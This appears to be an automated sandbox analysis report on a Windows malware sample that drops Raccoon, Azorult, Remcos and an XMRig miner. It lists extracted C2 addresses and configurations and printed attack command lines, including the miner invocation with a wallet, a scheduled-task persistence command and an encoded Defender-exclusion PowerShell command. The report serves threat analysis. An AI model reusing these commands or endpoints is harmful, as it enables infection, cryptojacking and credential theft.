Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-01-2023 10:09
Static task
static1
Behavioral task
behavioral1
Sample
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
Resource
win10v2004-20220812-en
General
-
Target
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
-
Size
831KB
-
MD5
f29f6dc54c33b2aae2950019ee54b04c
-
SHA1
c37d98a04edbe68fbd4e054fe0e96b1c926460ea
-
SHA256
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539
-
SHA512
3205deea23d0655968935d26028e895d10b82594afc0ce17a5e2454a4c50584dc11564f0f1acf46ec0cc41dc0b6d3e638803934649f5834c75b04e708473967c
-
SSDEEP
24576:Mf78hVkC6gGhgfyNbpiODGsSm+FGUz9q:MAhf6gGhgab6shWz
Malware Config
Extracted
raccoon
75ea4cb7f040eb3056eaa4e86a3a9d6c
http://91.215.85.146/
Extracted
azorult
http://195.245.112.115/index.php
Extracted
remcos
1122023
nikahuve.ac.ug:65214
kalskala.ac.ug:65214
tuekisaa.ac.ug:65214
parthaha.ac.ug:65214
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
true
-
keylog_file
vgbvfxs.dat
-
keylog_flag
false
-
keylog_folder
fsscbas
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
fdsgsdmhj-9K01C1
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/764-230-0x0000000140344454-mapping.dmp xmrig behavioral2/memory/764-229-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/764-231-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/764-232-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/764-234-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig behavioral2/memory/764-242-0x0000000140000000-0x00000001407CA000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
o2lg73DX.exeIJkEgC91.exebb3Ar2Hz.exeFaxv70f9.exeIJkEgC91.exebb3Ar2Hz.exeo2lg73DX.exeFaxv70f9.exeFaxv70f9.exeoobeldr.exeoobeldr.exeoobeldr.exepid process 3500 o2lg73DX.exe 4904 IJkEgC91.exe 1688 bb3Ar2Hz.exe 5076 Faxv70f9.exe 1148 IJkEgC91.exe 1536 bb3Ar2Hz.exe 4380 o2lg73DX.exe 4776 Faxv70f9.exe 2908 Faxv70f9.exe 3948 oobeldr.exe 3720 oobeldr.exe 4464 oobeldr.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
o2lg73DX.exeoobeldr.exe8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeIJkEgC91.exeFaxv70f9.exebb3Ar2Hz.exeo2lg73DX.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation o2lg73DX.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation oobeldr.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation IJkEgC91.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Faxv70f9.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation bb3Ar2Hz.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation o2lg73DX.exe -
Loads dropped DLL 7 IoCs
Processes:
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeo2lg73DX.exepid process 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 4380 o2lg73DX.exe 4380 o2lg73DX.exe 4380 o2lg73DX.exe 4380 o2lg73DX.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Faxv70f9.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wdzblwjl = "\"C:\\Users\\Admin\\AppData\\Roaming\\Amlcowp\\Wdzblwjl.exe\"" Faxv70f9.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 7 IoCs
Processes:
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeIJkEgC91.exebb3Ar2Hz.exeo2lg73DX.exeFaxv70f9.exeIJkEgC91.exeoobeldr.exedescription pid process target process PID 1088 set thread context of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 4904 set thread context of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 1688 set thread context of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 3500 set thread context of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 5076 set thread context of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 1148 set thread context of 764 1148 IJkEgC91.exe AddInProcess.exe PID 3948 set thread context of 3720 3948 oobeldr.exe oobeldr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
o2lg73DX.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 o2lg73DX.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString o2lg73DX.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3184 schtasks.exe 4944 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4176 timeout.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
Processes:
powershell.exeFaxv70f9.exepowershell.exeo2lg73DX.exeIJkEgC91.exepid process 912 powershell.exe 5076 Faxv70f9.exe 5076 Faxv70f9.exe 4236 powershell.exe 912 powershell.exe 4236 powershell.exe 4380 o2lg73DX.exe 4380 o2lg73DX.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe 1148 IJkEgC91.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 664 -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeIJkEgC91.exeIJkEgC91.exeFaxv70f9.exebb3Ar2Hz.exeo2lg73DX.exepowershell.exepowershell.exeAddInProcess.exeoobeldr.exedescription pid process Token: SeDebugPrivilege 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Token: SeDebugPrivilege 4904 IJkEgC91.exe Token: SeDebugPrivilege 1148 IJkEgC91.exe Token: SeDebugPrivilege 5076 Faxv70f9.exe Token: SeDebugPrivilege 1688 bb3Ar2Hz.exe Token: SeDebugPrivilege 3500 o2lg73DX.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeLockMemoryPrivilege 764 AddInProcess.exe Token: SeLockMemoryPrivilege 764 AddInProcess.exe Token: SeDebugPrivilege 3948 oobeldr.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AddInProcess.exepid process 764 AddInProcess.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Faxv70f9.exepid process 2908 Faxv70f9.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeIJkEgC91.exebb3Ar2Hz.exeo2lg73DX.exebb3Ar2Hz.exeFaxv70f9.execmd.execmd.exedescription pid process target process PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 1088 wrote to memory of 3264 1088 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe PID 3264 wrote to memory of 3500 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe o2lg73DX.exe PID 3264 wrote to memory of 3500 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe o2lg73DX.exe PID 3264 wrote to memory of 3500 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe o2lg73DX.exe PID 3264 wrote to memory of 4904 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe IJkEgC91.exe PID 3264 wrote to memory of 4904 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe IJkEgC91.exe PID 3264 wrote to memory of 1688 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe bb3Ar2Hz.exe PID 3264 wrote to memory of 1688 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe bb3Ar2Hz.exe PID 3264 wrote to memory of 1688 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe bb3Ar2Hz.exe PID 3264 wrote to memory of 5076 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Faxv70f9.exe PID 3264 wrote to memory of 5076 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Faxv70f9.exe PID 3264 wrote to memory of 5076 3264 8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe Faxv70f9.exe PID 4904 wrote to memory of 2064 4904 IJkEgC91.exe cmd.exe PID 4904 wrote to memory of 2064 4904 IJkEgC91.exe cmd.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 4904 wrote to memory of 1148 4904 IJkEgC91.exe IJkEgC91.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 1688 wrote to memory of 1536 1688 bb3Ar2Hz.exe bb3Ar2Hz.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 3500 wrote to memory of 4380 3500 o2lg73DX.exe o2lg73DX.exe PID 1536 wrote to memory of 3184 1536 bb3Ar2Hz.exe schtasks.exe PID 1536 wrote to memory of 3184 1536 bb3Ar2Hz.exe schtasks.exe PID 1536 wrote to memory of 3184 1536 bb3Ar2Hz.exe schtasks.exe PID 5076 wrote to memory of 4448 5076 Faxv70f9.exe cmd.exe PID 5076 wrote to memory of 4448 5076 Faxv70f9.exe cmd.exe PID 5076 wrote to memory of 4448 5076 Faxv70f9.exe cmd.exe PID 2064 wrote to memory of 912 2064 cmd.exe powershell.exe PID 2064 wrote to memory of 912 2064 cmd.exe powershell.exe PID 4448 wrote to memory of 4236 4448 cmd.exe powershell.exe PID 4448 wrote to memory of 4236 4448 cmd.exe powershell.exe PID 4448 wrote to memory of 4236 4448 cmd.exe powershell.exe PID 5076 wrote to memory of 4776 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 4776 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 4776 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe PID 5076 wrote to memory of 2908 5076 Faxv70f9.exe Faxv70f9.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe"C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe"
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exeC:\Users\Admin\AppData\Local\Temp\8c5df030de0c79f2155a60e0d5f41889ec8d07d441279d406996dca4639f8539.exe
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\o2lg73DX.exe"C:\Users\Admin\AppData\Roaming\o2lg73DX.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\o2lg73DX.exeC:\Users\Admin\AppData\Roaming\o2lg73DX.exe
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "o2lg73DX.exe"
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 3
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\IJkEgC91.exe"C:\Users\Admin\AppData\Roaming\IJkEgC91.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\IJkEgC91.exeC:\Users\Admin\AppData\Roaming\IJkEgC91.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:14433 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.worker1 -p x --tls --algo rx/0 --cpu-max-threads-hint=50
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exe"C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exe"
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exeC:\Users\Admin\AppData\Roaming\bb3Ar2Hz.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exe"C:\Users\Admin\AppData\Roaming\Faxv70f9.exe"
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeC:\Users\Admin\AppData\Roaming\Faxv70f9.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeC:\Users\Admin\AppData\Roaming\Faxv70f9.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exeC:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\mozglue.dllFilesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
C:\Users\Admin\AppData\LocalLow\nss3.dllFilesize
1MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
C:\Users\Admin\AppData\LocalLow\sqlite3.dllFilesize
1MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oobeldr.exe.logFilesize
1KB
MD52e49a0dc2cc777cf418322c4466c896e
SHA1d1c48311da63a8124b58ca948b0d64409e927d2d
SHA256b6e3216891c905bc01dfa776fb8f50aadd5b51b997551eb32ad5e21a53574041
SHA512b03923994a5b5b0c8ea0905a19a820eda810ded3687e965ee280641eb6b9dd8bf36ce3984bb04712199fcaffc28cacbbadcc872e12b2bda7f491091aa656156a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD53f1db0952d1894de97e7630ee91945a6
SHA1524f1d7f76486b7aeb3eb5671b966e38141fe372
SHA2560e04515add5f611132a93b4a5e770ce4b2e1e81572c566fcb0406573ac4a6b72
SHA512226aec6981a4b6225534dcd9340b6aa205f0a6f258d6e5990aa251ce13ca8f7bfbc32920deb8c5aa7dd094a759fa29d660ae25f4eb01e5cd40809336f42d84dd
-
C:\Users\Admin\AppData\Local\Temp\C6D72293\mozglue.dllFilesize
135KB
MD59e682f1eb98a9d41468fc3e50f907635
SHA185e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SHA512230230722d61ac1089fabf3f2decfa04f9296498f8e2a2a49b1527797dca67b5a11ab8656f04087acadf873fa8976400d57c77c404eba4aff89d92b9986f32ed
-
C:\Users\Admin\AppData\Local\Temp\C6D72293\msvcp140.dllFilesize
429KB
MD5109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\Users\Admin\AppData\Local\Temp\C6D72293\nss3.dllFilesize
1MB
MD5556ea09421a0f74d31c4c0a89a70dc23
SHA1f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SHA5122481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2
-
C:\Users\Admin\AppData\Local\Temp\C6D72293\vcruntime140.dllFilesize
81KB
MD57587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeFilesize
1MB
MD5d48f082a4ddfaffaffc718bbbe13daac
SHA10cdea96bfbbbddb879f35ced74620292c2cbf687
SHA256e623fb7f8f26f1222cc777af5a585acbf9cc5e1f72f09aeae3dcee8c518864e0
SHA512558cdc2c80a6d9789d0faece85d17c37171305af4324c0176b369cdf4bde6472c07547ece539493ba5c79c6d2d9ca3699aff97182fee4ffff71f0436e7376aba
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeFilesize
1MB
MD5d48f082a4ddfaffaffc718bbbe13daac
SHA10cdea96bfbbbddb879f35ced74620292c2cbf687
SHA256e623fb7f8f26f1222cc777af5a585acbf9cc5e1f72f09aeae3dcee8c518864e0
SHA512558cdc2c80a6d9789d0faece85d17c37171305af4324c0176b369cdf4bde6472c07547ece539493ba5c79c6d2d9ca3699aff97182fee4ffff71f0436e7376aba
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeFilesize
1MB
MD5d48f082a4ddfaffaffc718bbbe13daac
SHA10cdea96bfbbbddb879f35ced74620292c2cbf687
SHA256e623fb7f8f26f1222cc777af5a585acbf9cc5e1f72f09aeae3dcee8c518864e0
SHA512558cdc2c80a6d9789d0faece85d17c37171305af4324c0176b369cdf4bde6472c07547ece539493ba5c79c6d2d9ca3699aff97182fee4ffff71f0436e7376aba
-
C:\Users\Admin\AppData\Roaming\Faxv70f9.exeFilesize
1MB
MD5d48f082a4ddfaffaffc718bbbe13daac
